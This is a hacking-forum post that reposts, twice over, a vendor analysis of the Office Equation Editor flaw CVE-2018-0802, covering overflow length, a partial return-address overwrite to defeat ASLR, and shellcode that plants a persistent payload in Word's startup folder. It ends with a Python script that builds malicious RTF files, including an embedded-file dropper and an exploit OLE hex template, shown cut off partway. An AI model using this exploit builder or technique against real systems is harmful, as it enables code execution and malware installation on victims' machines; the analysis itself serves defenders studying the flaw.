dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 27
- Reaction score
- 45,549
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Introduction
The Microsoft Security Patch of January 2018 fixes the Office 0day vulnerability (CVE-2018-0802) captured by the 360 Core Security Advanced Threat Response Team. This vulnerability affects almost all versions of Office that Microsoft currently supports.This is the second outbreak of high-level threats using zero-day loopholes since 360's first global interception of the Office 0day vulnerability (CVE-2017-11826).The 360 core security team has been actively communicating with Microsoft and working together to promote the repair of the 0day loophole so that the vulnerability can be properly resolved before disclosure of vulnerability information.The technical principle of the vulnerability is similar to the 17-year-old "Dream Formula" loophole (CVE-2017-11882). It is a re-initiated attack by the hacker using the EQNEDT32.EXE embedded in the office's embedded equation editor. We call it "Nightmare". Formula II (CVE-2018-0802).
Attack process analysis
We captured several in-field attacks of "Dream Formula II". The on-the-spot samples were embedded with two formulae objects using Nday and 0day loopholes. At the same time, Nday loopholes can attack unpatched systems, and 0day loopholes attack all patches. The system bypasses the ASLR (Address Randomization) security measures of the CVE-2017-11882 patch, and the attack will eventually implant a malicious remote control program on the user's computer.
Figure: "Dream Formula II" in the wild sample attack process
Vulnerability analysis
"Dream Formula II" is a patch bypass vulnerability of CVE-2017-11882. The type is stack overflow. The root cause is Microsoft's stack overflow in the "Dream Formula Generation" patch that does not fix the copy of the font FaceName.This vulnerability will only cause a crash on an unpatched version, but it can be perfectly utilized on a patched version.Below we analyze the CVE-2018-0802 vulnerability by poc samples.
Static analysis
As with CVE-2017-11882, the trigger data for this vulnerability is within the "Equation Native" stream of the extracted OLE object.The red coiled portion in Figure 1 is core data with a total of 0x99 = 153 bytes.0×08 represents the font tag, followed by 00 01 respectively represents the typeface and style of the font, and the area from 33 to 25 00 is the name of the Font, which is the data copied when the stack overflows.This part of the data contains shellcode, bypass ASLR tricks, process command lines, and related data for padding. We will analyze them later.
figure 1
Equation Native data structure
According to information published online, the entire "EquationNative" data structure is:
EquationNative Stream Data = EQNOLEFILEHDR + MTEFData
MTEFData = MTEF header + MTEF Byte Stream.
The structure of QNOLEFILEHDR is shown in Figure 2:
figure 2
The structure of the MTEF header is shown in Table 1. Regarding this structure, there are differences between the actual data and the format specifications that we observed. The following table shows the actual observations:
Offset
Instructions
value
0
MTEF version number
0×03
1
The data generation platform
0x00 is generated on Macintosh platform, 0x01 is generated on Windows platform
2
Generated product of this data
0×00 is generated by MathType, 0×01 is generated by Equation Editor
3
Product major version number
0×03
4
Product minor version number
0x0A
Table 1
In the attack sample, the MTEF ByteStream structure is shown in Table 2:
Initial SIZE record
FONT records
FONT content
Remaining data
Table 2
The FONT record and FONT content structure are shown in Table 3:
member
Instructions
Note
Tag
0×08
1 byte
Tface
Typeface number
1 byte
Style
Font style
1 byte
Name
Font name
NULL-terminated ASCII string
table 3
Patch bypass analysis
CVE-2018-0802 vulnerability trigger point is located in sub_21E39 (module address is set to 0 in the IDA), as shown in Figure 3, it can be seen that the function of the function is to initialize a LOGFONT structure according to the font data in the formula :
image 3
Let's take a look at Microsoft's description of the LOGFONT structure (Figure 4).You can see that the last member of this structure is lfFaceName,
Figure 4: LOGFONT Structure
Let's take another look at Microsoft's description of the lfFaceName member (Figure 5).You can see that lfFaceName represents the typeface name of the font. On the version being analyzed, it is a null-terminated char string with a maximum length of 32, which contains the terminator NULL.
Figure 5
The problem is obvious: the code in the red box in Figure 3 does not limit the copy length when copying the font FaceName, and the source data for the copy is the user-supplied font name, and the destination address is a LOGFONT structure body address passed in from the parent function.We look back to the parent function of sub_21E39 (Figure 6), you can see this address is located on the stack opened by the parent function, is a local variable of the parent function.The attacker constructs malicious data, overwrites the last two bytes of the return address of the parent function (sub_21774), and then directs the control flow to the shellcode on the stack.
Figure 6
During the analysis, we found a place of suspected recursion. Figure 7 shows the disassembly code of sub_21774. We can see that sub_21774 first calls the vulnerability function sub_21E39 to initialize a LOGFONT structure, and then calls the relevant API to pass in the structure. The system gets a font name saved to Name.Then, it compares the obtained Name with the user-supplied lpLogFont. If it is inconsistent (and the sub_115A7 function needs to return False), it will continue to call or not call itself according to the condition specified by a3, while a3 is the third of sub_21E39 function. Parameters.
Figure 7
Let's take a look at the third parameters of the parameters, otherwise there may be multiple recursive, can not effectively use this overflow.According to the previous CVE-2017-11882 debugging results (Figure 8), we can see that when parsing the user-supplied font data, the function calling sub_21774 is sub_214C6.Let's look back at sub_214C6 (Figure 9). Sub_214C6 calls sub_21774 to pass a value of 1 to the third parameter, so if(a3) in Figure 7 is true.Let's look at Figure 7, when sub_21774 recursively calls itself, the value passed to the 3rd parameter is 0, which means that sub_21774 will not call itself again, and the recursion level will only have 1 level.Analyzed here, recursive doubts have been solved.
Figure 8: CVE-2017-11882 Triggered Execution Flow
Figure 9
One problem that has been analyzed here is that if _strcmpi(lpLogfont, &Name) is not true (if the font data is forged by the user, it certainly does not hold here), sub_115A7 will be called, which means that it will go to CVE-2017. -11882 overflow point.In the version without the November patch, if you want to successfully use CVE-2017-11882, CVE-2018-0802 points will not overflow because the former needs to have a much smaller overflow size than the latter, and the copy last has a NULL truncation (we know that the controllable eip that overflows to CVE-2017-11882 requires only 0x2C bytes, and through the analysis below (Figure 11) we can see that the controllable eip overflowing to CVE-2018-0802 requires 0x 94 bytes).On the other hand, if you want to trigger CVE-2018-0802 on a version that does not have an November patch, CVE-2017-11882 will be triggered first.In short, CVE-2018-0802 is not available on the pre-11 patch.
However, as can be seen from Figure 10, in the November patch, before the copy of CVE-2017-11882 overflow point, Microsoft performed a length limit of 0x20 on the copy length, and after the copy was completed, it was manually copied at the end of the copy. A NULL was added to invalidate CVE-2017-11882.This directly leads to CVE-2018-0802 being unusable before patching!Now, as long as sub_115A7 returns False, the exploit can be perfectly exploited, and actual debugging finds that sub_115A7 returns False.
Figure 10
Dynamic Analysis
Spillover data copy
With the above analysis, dynamic analysis becomes very simple.Since this overflow point will copy the data, let's monitor the source string and the corresponding stack traceback for each copy. We first enter the OLE data-related Load function (sub_6881), and then break the point before copying the data and proceed. Output, the result is shown in the code:
It can be seen from the log that there are two copies, and we can know from the stack trace back that these two copies are the two calls to sub_21174 in the static analysis.The first time is the sub_214c6 call to sub_21174, and the second is the sub_21174 call to itself.It can be seen that the stack overflow obviously occurs on the first copy.Here to mention a little bit, cb ce cc e5 stands for Songs.
Let us calculate in detail how much length we need to overflow to control the return address of the parent function (sub_21174). (The conclusion of this question has been mentioned in the “Patch bypass analysis” section). From Figure 11 we can see from lfFaceName(-0× 90) Overflow to ret_addr (+0x4), a total of 0x94 bytes are required. Exceeding the 0x94 portion of the byte will cover the return address one by one from the low address.
Figure 11
We look at the data in the POC. As shown in Figure 12, the blue part is the first 0x94 bytes of the overflow, the 2500 is the last two bytes of the overflow, and 00 is the terminator. When the copy encounters 00 Stop.According to the little end address layout, when the poc is running, the EIP will only cover the lower 2 bytes.Why did you do this?The answer is to bypass ASLR.
Figure 12
Bypass ASLR
Let's take a look at why two bytes of a district can bypass ASLR.
First of all, we must be clear that the patch file is opened ASLR, as shown in Figure 13.As a result, the base address for loading EQNEDT32.EXE is random each time, so the first problem to be considered when overflowing is how to bypass ASLR.(As for DEP, you can see from Figure 14 that DEQ is not enabled in EQNEDT32.EXE in the patch file, so it is not necessary to consider DEP under normal circumstances)
Unfortunately, attackers clearly understand the Windows system mechanisms and defenses.Because on the Windows platform, the ASLR of a 32-bit process only randomizes the upper 2 bytes of the address each time, while the lower 2 bytes remain unchanged.If a ret instruction can be found in the same low 0xFFFF space of the covered address, and the address is 0xABCD00XY (where ABCD and XY are 6 arbitrary hexadecimal numbers, the second to last byte in the address Must be 0x00, because after the copy needs to be accurately truncated, you can directly use this ret to jump to the stack.Since there is no need to bypass DEP, shellcode can be executed directly on the stack.
Figure 13: ASLR Status of EQNEDT32.EXE is Enabled and DEP is Non-Permanent DEP
Figure 14: DEP Status of EQNEDT32.EXE is Disabled
More unfortunately, within the EQNEDT32.EXE module, Microsoft really gave and gave only one such address (Figure 15). There are only one address that satisfies the condition, namely, 20025, two bytes that are covered in the eip. 25 00 is unique, there is no second ret that satisfies the condition.
Figure 15
Let's consider what the original return address of sub_21174 is.Of course, sub_214C6 calls the address of the next instruction of sub_21174. It can be seen from Fig. 16 that the offset of this address is 214E2. According to the overlay of Fig. 12, the offset after the overlay becomes 20025, which consists of the above analysis and Fig. 17 As you can see, this address is a ret instruction.This instruction will pop up sub_214C6 to the first parameter of sub_21174 and switch the control flow to this value to execute.To make matters worse, this first parameter happens to be lpLogFont, which is the FontName provided by the user.So after ret is executed, the control flow will be transferred to the stack and it will just start executing the first byte of the user-supplied FontName.
Figure 16
Figure 17
Sample A Shellcode Analysis
In poc for sample A transformation, control flow hijacking and execution of the shellcode section are shown in Figure 18:
Figure 18: Due to the existence of recursion, we need to return twice from the sub_21774 function, which explains the first two rets
Immediately after the jmpeax instruction, WinExec is called, and the command line parameter happens to be calc.exe, as shown in Figure 19:
Figure 19
Sample B Shellcode Analysis
Sample B bypasses ASLR in the same way as Sample A, but the shellcode portion is not the same as Sample A.Sample B's shellcode finds the kernel32.dll export table (Figures 20 and 21) through the PEB, and then searches through the export table for a hash of the desired function through a specific hash algorithm (Figure 21). The hash value is given in shellcode.The shellcode then saves the searched function address to where the hash value was previously stored (Figure 22).
Figure 20: Hash value and copy path name given in sample B's shellcode
Figure 21: Finding the required function in the export table of kernel32.dll with the hash value
Figure 22: Comparison of data on the stack before and after finding the function address
After successfully finding the function and saving the address on the stack, first call the ExpandEnvironmentStringsA function to expand the short path (the short path is saved in the shellcode), and then call CopyFileA to copy the payload to the word plugin directory so that the payload will follow the word next time. Start automatically loaded into memory.Finally call ExitProcess to exit the Equation Editor process (Figure 23).The entire process does not affect the normal opening of the document.
Figure 23: Expand the short path, copy the file, and exit the process
to sum up
The 0day vulnerabilities used by "CVE-2018-0802" are called CVE-2017-11882's twin vulnerabilities. One vulnerability in the attack sample is for unpatched systems, and the other is for vulnerabilities. The system uses two OLEs to attack at the same time. The hackers' well-constructed attacks are perfectly compatible with the different circumstances of the system vulnerability patch environment.The use of this loophole and the Bypass ASLR approach have a certain degree of coincidence, if there is no ret instruction in the EQNEDT32.EXE module can be used to bypass the ASLR, if lpLogFont is not the first parameter of sub_21774, if CVE - 2017-11882 patch repair method forced DEP protection, "Dream Formula II" will not have the opportunity.
The latest 360 security products have been able to detect and prevent this zero-day vulnerability, and we recommend that users update the Microsoft Security Patch for January 2018.
reference
Code .py
The Microsoft Security Patch of January 2018 fixes the Office 0day vulnerability (CVE-2018-0802) captured by the 360 Core Security Advanced Threat Response Team. This vulnerability affects almost all versions of Office that Microsoft currently supports.This is the second outbreak of high-level threats using zero-day loopholes since 360's first global interception of the Office 0day vulnerability (CVE-2017-11826).The 360 core security team has been actively communicating with Microsoft and working together to promote the repair of the 0day loophole so that the vulnerability can be properly resolved before disclosure of vulnerability information.The technical principle of the vulnerability is similar to the 17-year-old "Dream Formula" loophole (CVE-2017-11882). It is a re-initiated attack by the hacker using the EQNEDT32.EXE embedded in the office's embedded equation editor. We call it "Nightmare". Formula II (CVE-2018-0802).
Attack process analysis
We captured several in-field attacks of "Dream Formula II". The on-the-spot samples were embedded with two formulae objects using Nday and 0day loopholes. At the same time, Nday loopholes can attack unpatched systems, and 0day loopholes attack all patches. The system bypasses the ASLR (Address Randomization) security measures of the CVE-2017-11882 patch, and the attack will eventually implant a malicious remote control program on the user's computer.
This link is hidden for visitors. Please Log in or register now.
Figure: "Dream Formula II" in the wild sample attack process
Vulnerability analysis
"Dream Formula II" is a patch bypass vulnerability of CVE-2017-11882. The type is stack overflow. The root cause is Microsoft's stack overflow in the "Dream Formula Generation" patch that does not fix the copy of the font FaceName.This vulnerability will only cause a crash on an unpatched version, but it can be perfectly utilized on a patched version.Below we analyze the CVE-2018-0802 vulnerability by poc samples.
Static analysis
As with CVE-2017-11882, the trigger data for this vulnerability is within the "Equation Native" stream of the extracted OLE object.The red coiled portion in Figure 1 is core data with a total of 0x99 = 153 bytes.0×08 represents the font tag, followed by 00 01 respectively represents the typeface and style of the font, and the area from 33 to 25 00 is the name of the Font, which is the data copied when the stack overflows.This part of the data contains shellcode, bypass ASLR tricks, process command lines, and related data for padding. We will analyze them later.
This link is hidden for visitors. Please Log in or register now.
figure 1
Equation Native data structure
According to information published online, the entire "EquationNative" data structure is:
EquationNative Stream Data = EQNOLEFILEHDR + MTEFData
MTEFData = MTEF header + MTEF Byte Stream.
The structure of QNOLEFILEHDR is shown in Figure 2:
This link is hidden for visitors. Please Log in or register now.
figure 2
The structure of the MTEF header is shown in Table 1. Regarding this structure, there are differences between the actual data and the format specifications that we observed. The following table shows the actual observations:
Offset
Instructions
value
0
MTEF version number
0×03
1
The data generation platform
0x00 is generated on Macintosh platform, 0x01 is generated on Windows platform
2
Generated product of this data
0×00 is generated by MathType, 0×01 is generated by Equation Editor
3
Product major version number
0×03
4
Product minor version number
0x0A
Table 1
In the attack sample, the MTEF ByteStream structure is shown in Table 2:
Initial SIZE record
FONT records
FONT content
Remaining data
Table 2
The FONT record and FONT content structure are shown in Table 3:
member
Instructions
Note
Tag
0×08
1 byte
Tface
Typeface number
1 byte
Style
Font style
1 byte
Name
Font name
NULL-terminated ASCII string
table 3
Patch bypass analysis
CVE-2018-0802 vulnerability trigger point is located in sub_21E39 (module address is set to 0 in the IDA), as shown in Figure 3, it can be seen that the function of the function is to initialize a LOGFONT structure according to the font data in the formula :
This link is hidden for visitors. Please Log in or register now.
image 3
Let's take a look at Microsoft's description of the LOGFONT structure (Figure 4).You can see that the last member of this structure is lfFaceName,
This link is hidden for visitors. Please Log in or register now.
Figure 4: LOGFONT Structure
Let's take another look at Microsoft's description of the lfFaceName member (Figure 5).You can see that lfFaceName represents the typeface name of the font. On the version being analyzed, it is a null-terminated char string with a maximum length of 32, which contains the terminator NULL.
This link is hidden for visitors. Please Log in or register now.
Figure 5
The problem is obvious: the code in the red box in Figure 3 does not limit the copy length when copying the font FaceName, and the source data for the copy is the user-supplied font name, and the destination address is a LOGFONT structure body address passed in from the parent function.We look back to the parent function of sub_21E39 (Figure 6), you can see this address is located on the stack opened by the parent function, is a local variable of the parent function.The attacker constructs malicious data, overwrites the last two bytes of the return address of the parent function (sub_21774), and then directs the control flow to the shellcode on the stack.
This link is hidden for visitors. Please Log in or register now.
Figure 6
During the analysis, we found a place of suspected recursion. Figure 7 shows the disassembly code of sub_21774. We can see that sub_21774 first calls the vulnerability function sub_21E39 to initialize a LOGFONT structure, and then calls the relevant API to pass in the structure. The system gets a font name saved to Name.Then, it compares the obtained Name with the user-supplied lpLogFont. If it is inconsistent (and the sub_115A7 function needs to return False), it will continue to call or not call itself according to the condition specified by a3, while a3 is the third of sub_21E39 function. Parameters.
This link is hidden for visitors. Please Log in or register now.
Figure 7
Let's take a look at the third parameters of the parameters, otherwise there may be multiple recursive, can not effectively use this overflow.According to the previous CVE-2017-11882 debugging results (Figure 8), we can see that when parsing the user-supplied font data, the function calling sub_21774 is sub_214C6.Let's look back at sub_214C6 (Figure 9). Sub_214C6 calls sub_21774 to pass a value of 1 to the third parameter, so if(a3) in Figure 7 is true.Let's look at Figure 7, when sub_21774 recursively calls itself, the value passed to the 3rd parameter is 0, which means that sub_21774 will not call itself again, and the recursion level will only have 1 level.Analyzed here, recursive doubts have been solved.
This link is hidden for visitors. Please Log in or register now.
Figure 8: CVE-2017-11882 Triggered Execution Flow
This link is hidden for visitors. Please Log in or register now.
Figure 9
One problem that has been analyzed here is that if _strcmpi(lpLogfont, &Name) is not true (if the font data is forged by the user, it certainly does not hold here), sub_115A7 will be called, which means that it will go to CVE-2017. -11882 overflow point.In the version without the November patch, if you want to successfully use CVE-2017-11882, CVE-2018-0802 points will not overflow because the former needs to have a much smaller overflow size than the latter, and the copy last has a NULL truncation (we know that the controllable eip that overflows to CVE-2017-11882 requires only 0x2C bytes, and through the analysis below (Figure 11) we can see that the controllable eip overflowing to CVE-2018-0802 requires 0x 94 bytes).On the other hand, if you want to trigger CVE-2018-0802 on a version that does not have an November patch, CVE-2017-11882 will be triggered first.In short, CVE-2018-0802 is not available on the pre-11 patch.
However, as can be seen from Figure 10, in the November patch, before the copy of CVE-2017-11882 overflow point, Microsoft performed a length limit of 0x20 on the copy length, and after the copy was completed, it was manually copied at the end of the copy. A NULL was added to invalidate CVE-2017-11882.This directly leads to CVE-2018-0802 being unusable before patching!Now, as long as sub_115A7 returns False, the exploit can be perfectly exploited, and actual debugging finds that sub_115A7 returns False.
This link is hidden for visitors. Please Log in or register now.
Figure 10
Dynamic Analysis
Spillover data copy
With the above analysis, dynamic analysis becomes very simple.Since this overflow point will copy the data, let's monitor the source string and the corresponding stack traceback for each copy. We first enter the OLE data-related Load function (sub_6881), and then break the point before copying the data and proceed. Output, the result is shown in the code:
This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.
It can be seen from the log that there are two copies, and we can know from the stack trace back that these two copies are the two calls to sub_21174 in the static analysis.The first time is the sub_214c6 call to sub_21174, and the second is the sub_21174 call to itself.It can be seen that the stack overflow obviously occurs on the first copy.Here to mention a little bit, cb ce cc e5 stands for Songs.
Let us calculate in detail how much length we need to overflow to control the return address of the parent function (sub_21174). (The conclusion of this question has been mentioned in the “Patch bypass analysis” section). From Figure 11 we can see from lfFaceName(-0× 90) Overflow to ret_addr (+0x4), a total of 0x94 bytes are required. Exceeding the 0x94 portion of the byte will cover the return address one by one from the low address.
This link is hidden for visitors. Please Log in or register now.
Figure 11
We look at the data in the POC. As shown in Figure 12, the blue part is the first 0x94 bytes of the overflow, the 2500 is the last two bytes of the overflow, and 00 is the terminator. When the copy encounters 00 Stop.According to the little end address layout, when the poc is running, the EIP will only cover the lower 2 bytes.Why did you do this?The answer is to bypass ASLR.
This link is hidden for visitors. Please Log in or register now.
Figure 12
Bypass ASLR
Let's take a look at why two bytes of a district can bypass ASLR.
First of all, we must be clear that the patch file is opened ASLR, as shown in Figure 13.As a result, the base address for loading EQNEDT32.EXE is random each time, so the first problem to be considered when overflowing is how to bypass ASLR.(As for DEP, you can see from Figure 14 that DEQ is not enabled in EQNEDT32.EXE in the patch file, so it is not necessary to consider DEP under normal circumstances)
Unfortunately, attackers clearly understand the Windows system mechanisms and defenses.Because on the Windows platform, the ASLR of a 32-bit process only randomizes the upper 2 bytes of the address each time, while the lower 2 bytes remain unchanged.If a ret instruction can be found in the same low 0xFFFF space of the covered address, and the address is 0xABCD00XY (where ABCD and XY are 6 arbitrary hexadecimal numbers, the second to last byte in the address Must be 0x00, because after the copy needs to be accurately truncated, you can directly use this ret to jump to the stack.Since there is no need to bypass DEP, shellcode can be executed directly on the stack.
This link is hidden for visitors. Please Log in or register now.
Figure 13: ASLR Status of EQNEDT32.EXE is Enabled and DEP is Non-Permanent DEP
This link is hidden for visitors. Please Log in or register now.
Figure 14: DEP Status of EQNEDT32.EXE is Disabled
More unfortunately, within the EQNEDT32.EXE module, Microsoft really gave and gave only one such address (Figure 15). There are only one address that satisfies the condition, namely, 20025, two bytes that are covered in the eip. 25 00 is unique, there is no second ret that satisfies the condition.
This link is hidden for visitors. Please Log in or register now.
Figure 15
Let's consider what the original return address of sub_21174 is.Of course, sub_214C6 calls the address of the next instruction of sub_21174. It can be seen from Fig. 16 that the offset of this address is 214E2. According to the overlay of Fig. 12, the offset after the overlay becomes 20025, which consists of the above analysis and Fig. 17 As you can see, this address is a ret instruction.This instruction will pop up sub_214C6 to the first parameter of sub_21174 and switch the control flow to this value to execute.To make matters worse, this first parameter happens to be lpLogFont, which is the FontName provided by the user.So after ret is executed, the control flow will be transferred to the stack and it will just start executing the first byte of the user-supplied FontName.
This link is hidden for visitors. Please Log in or register now.
Figure 16
This link is hidden for visitors. Please Log in or register now.
Figure 17
Sample A Shellcode Analysis
In poc for sample A transformation, control flow hijacking and execution of the shellcode section are shown in Figure 18:
This link is hidden for visitors. Please Log in or register now.
Figure 18: Due to the existence of recursion, we need to return twice from the sub_21774 function, which explains the first two rets
Immediately after the jmpeax instruction, WinExec is called, and the command line parameter happens to be calc.exe, as shown in Figure 19:
This link is hidden for visitors. Please Log in or register now.
Figure 19
Sample B Shellcode Analysis
Sample B bypasses ASLR in the same way as Sample A, but the shellcode portion is not the same as Sample A.Sample B's shellcode finds the kernel32.dll export table (Figures 20 and 21) through the PEB, and then searches through the export table for a hash of the desired function through a specific hash algorithm (Figure 21). The hash value is given in shellcode.The shellcode then saves the searched function address to where the hash value was previously stored (Figure 22).
This link is hidden for visitors. Please Log in or register now.
Figure 20: Hash value and copy path name given in sample B's shellcode
This link is hidden for visitors. Please Log in or register now.
Figure 21: Finding the required function in the export table of kernel32.dll with the hash value
This link is hidden for visitors. Please Log in or register now.
Figure 22: Comparison of data on the stack before and after finding the function address
After successfully finding the function and saving the address on the stack, first call the ExpandEnvironmentStringsA function to expand the short path (the short path is saved in the shellcode), and then call CopyFileA to copy the payload to the word plugin directory so that the payload will follow the word next time. Start automatically loaded into memory.Finally call ExitProcess to exit the Equation Editor process (Figure 23).The entire process does not affect the normal opening of the document.
This link is hidden for visitors. Please Log in or register now.
Figure 23: Expand the short path, copy the file, and exit the process
to sum up
The 0day vulnerabilities used by "CVE-2018-0802" are called CVE-2017-11882's twin vulnerabilities. One vulnerability in the attack sample is for unpatched systems, and the other is for vulnerabilities. The system uses two OLEs to attack at the same time. The hackers' well-constructed attacks are perfectly compatible with the different circumstances of the system vulnerability patch environment.The use of this loophole and the Bypass ASLR approach have a certain degree of coincidence, if there is no ret instruction in the EQNEDT32.EXE module can be used to bypass the ASLR, if lpLogFont is not the first parameter of sub_21774, if CVE - 2017-11882 patch repair method forced DEP protection, "Dream Formula II" will not have the opportunity.
The latest 360 security products have been able to detect and prevent this zero-day vulnerability, and we recommend that users update the Microsoft Security Patch for January 2018.
reference
This link is hidden for visitors. Please Log in or register now.
Code .py
Code:
import argparse
import os
import struct
class Package(object):
"""
Packager spec based on:
https://phishme.com/rtf-malware-delivery/
Dropping method by Haifei Li:
https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
Found being used itw by @MalwareParty:
https://twitter.com/MalwareParty/status/943861021260861440
"""
def __init__(self, filename):
self.filename = os.path.basename(filename)
self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)
self.orgpath = self.fakepath
self.datapath = self.fakepath
with open(filename,'rb') as f:
self.data = f.read()
self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
self.OBJ_TAIL = r"0105000000000000}}"
def get_object_header(self):
OLEVersion = '01050000'
FormatID = '02000000'
ClassName = 'Package'
szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
szPackageData = struct.pack("<I", len(self.get_package_data())/2).encode('hex')
return ''.join([
OLEVersion,
FormatID,
szClassName,
ClassName.encode('hex') + '00',
'00000000',
'00000000',
szPackageData,
])
def get_package_data(self):
StreamHeader = '0200'
Label = self.filename.encode('hex') + '00'
OrgPath = self.orgpath.encode('hex') + '00'
UType = '00000300'
DataPath = self.datapath.encode('hex') + '00'
DataPathLen = struct.pack("<I", len(self.datapath)+1).encode('hex')
DataLen = struct.pack("<I", len(self.data)).encode('hex')
Data = self.data.encode('hex')
OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
OrgPathW = self.datapath.encode('utf-16le').encode('hex')
LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
LabelW = self.filename.encode('utf-16le').encode('hex')
DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
DefPathW = self.orgpath.encode('utf-16le').encode('hex')
return ''.join([
StreamHeader,
Label,
OrgPath,
UType,
DataPathLen,
DataPath,
DataLen,
Data,
OrgPathWLen,
OrgPathW,
LabelLen,
LabelW,
DefPathWLen,
DefPathW,
])
def build_package(self):
return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL
RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""
RTF_TRAILER = R"""\par}
"""
OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
OBJECT_TRAILER = R"""
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
"""
OBJDATA_TEMPLATE_0802 = R"""
01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1
B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001
0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05
000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C0000000000000460000000000
00000000000000B024837CC473D30103000000C00300000000000001004F006C0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000
